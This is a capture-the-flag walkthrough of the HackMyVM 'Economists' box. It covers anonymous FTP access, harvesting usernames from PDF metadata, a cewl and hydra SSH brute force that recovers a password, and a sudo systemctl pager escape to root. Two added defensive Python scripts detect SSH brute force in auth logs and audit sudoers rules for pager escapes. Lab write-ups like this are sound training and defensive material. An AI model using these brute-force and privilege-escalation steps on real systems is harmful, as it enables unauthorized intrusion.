[HackMyVM] Box: Economists

Difficulty: Easy

kali: 192.168.56.104

Target: 192.168.56.145

Port scan

┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

Open ports: 21 22 80

Try anonymous FTP login

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf
-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf
-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf
-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf
-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf
-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf
226 Directory send OK.

Lots of PDF files. Pulled them down with get and had a look; nothing in the PDF content itself, so check the metadata for usernames.

┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author                          : joseph
Author                          : richard
Author                          : crystal
Author                          : catherine
Author                          : catherine

Got several usernames, which may come in handy.

Run a quick directory scan first

┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html           (Status: 200) [Size: 35027]
/about.html           (Status: 200) [Size: 23219]
/contact.html         (Status: 200) [Size: 14317]
/blog.html            (Status: 200) [Size: 15196]
/main.html            (Status: 200) [Size: 931]
/services.html        (Status: 200) [Size: 17709]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html           (Status: 200) [Size: 18018]
/readme.txt           (Status: 200) [Size: 410]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html                (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================

Have a look at the web site

Didn't find anything exploitable

Tried brute-forcing SSH with the collected usernames. rockyou found nothing, probably the wrong wordlist, so use cewl to build a wordlist from the words on the web pages.

┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt

┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145   login: joseph   password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active

Got a credential pair: joseph:wealthiest
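From the defender's side, the hydra run above leaves a very recognisable trace in sshd's auth log: a burst of failed logins from one source, spread over several usernames, followed by a success. The script below is an added example (not part of the original writeup) that parses constructed auth.log lines in sshd's format, counts failures per source IP, and flags a success that follows a burst of failures from the same source.

```python
import re
from collections import defaultdict

# Constructed sample lines in sshd's auth.log format (not captured from the box).
SAMPLE_LOG = """\
Apr  4 19:22:08 elite-economists sshd[2001]: Failed password for invalid user richard from 192.168.56.104 port 51002 ssh2
Apr  4 19:22:08 elite-economists sshd[2002]: Failed password for joseph from 192.168.56.104 port 51003 ssh2
Apr  4 19:22:09 elite-economists sshd[2003]: Failed password for crystal from 192.168.56.104 port 51004 ssh2
Apr  4 19:22:09 elite-economists sshd[2004]: Failed password for invalid user catherine from 192.168.56.104 port 51005 ssh2
Apr  4 19:22:10 elite-economists sshd[2005]: Failed password for joseph from 192.168.56.104 port 51006 ssh2
Apr  4 19:22:11 elite-economists sshd[2006]: Accepted password for joseph from 192.168.56.104 port 51007 ssh2
Apr  4 19:30:00 elite-economists sshd[2100]: Accepted password for joseph from 192.168.56.1 port 40001 ssh2
"""

# "invalid user" appears when the username does not exist on the host.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def analyze(log_text, threshold=5):
    """Return {ip: {"failures": n, "users": set, "success_after_burst": [users]}}."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_after_burst": []})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        entry = stats[m["ip"]]
        if m["result"] == "Failed":
            entry["failures"] += 1
            entry["users"].add(m["user"])
        elif entry["failures"] >= threshold:
            # A success right after a burst of failures from the same source is
            # the signature of a brute force that found a working credential.
            entry["success_after_burst"].append(m["user"])
    return dict(stats)

def suspicious_sources(log_text, threshold=5):
    """Source IPs whose failure count reached the threshold."""
    return sorted(ip for ip, s in analyze(log_text, threshold).items()
                  if s["failures"] >= threshold)

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, s["failures"], sorted(s["users"]), s["success_after_burst"])
```

On a real host the same logic applies to `journalctl -u ssh` output; the threshold and a time window are the knobs to tune against legitimate typo rates.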

Straight to the user flag

┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145 
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 11:25:01 AM UTC

  System load:  0.26               Processes:               115
  Usage of /:   47.3% of 11.21GB   Users logged in:         0
  Memory usage: 7%                 IPv4 address for enp0s3: 192.168.56.145
  Swap usage:   0%

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

joseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr  4 11:23 .
drwxr-xr-x 6 root   root   4096 Sep 13  2023 ..
-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history
-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr  4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local
-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt
joseph@elite-economists:~$ cat user.txt
[ASCII-art logo omitted]
Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}

Check sudo -l

joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status

Run it directly

sudo /usr/bin/systemctl status

Then type !bash at the pager prompt at the bottom and you have root.

joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Thu 2024-04-04 10:57:17 UTC; 32min ago
   CGroup: /
           ├─user.slice
           │ └─user-1001.slice
           │   ├─user@1001.service …
           │   │ └─init.scope
           │   │   ├─1776 /lib/systemd/systemd --user
           │   │   └─1777 (sd-pam)
           │   └─session-4.scope
           │     ├─1760 sshd: joseph [priv]
           │     ├─1856 sshd: joseph@pts/0
           │     ├─1857 -bash
           │     ├─1898 sudo /usr/bin/systemctl status
           │     ├─1899 /usr/bin/systemctl status
           │     └─1900 pager
           ├─init.scope
           │ └─1 /sbin/init maybe-ubiquity
           └─system.slice
             ├─apache2.service
             │ ├─759 /usr/sbin/apache2 -k start
             │ ├─764 /usr/sbin/apache2 -k start
             │ └─765 /usr/sbin/apache2 -k start
             ├─systemd-networkd.service
             │ └─641 /lib/systemd/systemd-networkd
             ├─systemd-udevd.service
             │ └─393 /lib/systemd/systemd-udevd
             ├─cron.service
             │ └─659 /usr/sbin/cron -f
             ├─polkit.service
             │ └─667 /usr/lib/policykit-1/polkitd --no-debug
             ├─networkd-dispatcher.service
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)
root@elite-economists:~# cat ro*
[ASCII-art logo omitted]
Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}
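The root cause here is a sudoers rule that lets an unprivileged user run a command which hands control to an interactive pager. As an added defender-side example (not part of the original writeup), the script below parses sudoers-style rule lines and flags commands that can reach a pager or editor; the sample rules are constructed and include both the weak rule from this box and a hardened variant that pins `--no-pager`, since sudoers requires the exact argument list once arguments are given in the rule.

```python
import re
import shlex

# Constructed sudoers rules: the first mirrors the rule found on this box,
# the second is the hardened variant that pins the exact argument list.
SAMPLE_SUDOERS = """\
# weak: systemctl status opens $PAGER when the output exceeds the terminal
joseph ALL=(ALL) NOPASSWD: /usr/bin/systemctl status
# hardened: the argument list is pinned, so the pager is never started
joseph ALL=(ALL) NOPASSWD: /usr/bin/systemctl status --no-pager
ops    ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog
ops    ALL=(root) NOPASSWD: /usr/bin/journalctl -u apache2 --no-pager
ops    ALL=(root) /usr/sbin/service apache2 restart
"""

# user host=(runas) TAG: cmd [, cmd...]   (Defaults lines do not match)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)

# Programs that start $PAGER unless told not to, and programs that are
# themselves interactive (basenames only; the path is stripped before lookup).
PAGER_SPAWNERS = {"systemctl", "journalctl"}
INTERACTIVE = {"less", "more", "vim", "vi", "nano", "man"}

def audit(sudoers_text):
    """Return a list of (rule_line, reason) for rules that can reach an interactive program."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in (c.strip() for c in m["cmd"].split(",")):
            argv = shlex.split(cmd)
            name = argv[0].rsplit("/", 1)[-1]
            if name in INTERACTIVE:
                findings.append((line, f"{name} is an interactive program"))
            elif name in PAGER_SPAWNERS and "--no-pager" not in argv[1:]:
                findings.append((line, f"{name} may start a pager; pin --no-pager in the rule"))
    return findings

if __name__ == "__main__":
    for rule, reason in audit(SAMPLE_SUDOERS):
        print(f"{reason}: {rule}")
```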

Now that is what Easy difficulty looks like.

This article was submitted by an internet user and represents only the author's views, not those of this site. The site only provides storage space and does not own the content or bear legal responsibility for it. If reposting, please cite the source: http://www.mzph.cn/news/792511.shtml
